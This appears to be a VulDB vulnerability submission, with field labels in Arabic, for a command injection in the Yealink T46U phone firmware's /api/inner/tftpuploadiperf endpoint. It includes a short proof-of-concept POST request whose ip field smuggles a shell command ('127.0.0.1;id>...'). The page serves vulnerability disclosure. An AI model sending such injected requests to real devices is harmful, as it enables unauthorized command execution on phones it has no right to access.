| عنوان | yealink T46U 108.86.0.118 Command Injection |
|---|
| الوصف | Yealink T46U phone firmware `x.x.x.x` contains a command injection vulnerability and a stack buffer overflow vulnerability in the Web FastCGI service `fcgiserver`. The vulnerable endpoint is:
```text
POST /api/inner/tftpuploadiperf
```
This endpoint is handled by `mod_webd.TFTPUploadIperf()`. The handler receives the `ip` and `port` parameters from the HTTP request and concatenates them directly into a shell command using `sprintf()`. No handler-local validation, escaping, or length check is applied before the command is passed to `system()`.
poc
POST /api/inner/tftpuploadiperf?p=Setting&t=<timestamp> HTTP/1.1
Host: <target>
Cookie: JSESSIONID=<valid-session>
X-Csrftoken: <valid-token>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
ip=127.0.0.1;id>/tmp/tftpuploadiperf_poc&port=69 |
|---|
| المصدر | ⚠️ http://cdn2.v50to.cc/T46U/T46U_mod_webd_TFTPUploadIperf_system_exec.zip |
|---|
| المستخدم | ChiChen241 (UID 98424) |
|---|
| ارسال | 21/05/2026 04:57 AM (26 أيام منذ) |
|---|
| الاعتدال | 14/06/2026 03:54 PM (24 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 370866 [Yealink SIP-T46U 108.86.0.118 Web FastCGI Service tftpuploadiperf mod_webd.TFTPUploadIperf ip/port تجاوز الصلاحيات] |
|---|
| النقاط | 20 |
|---|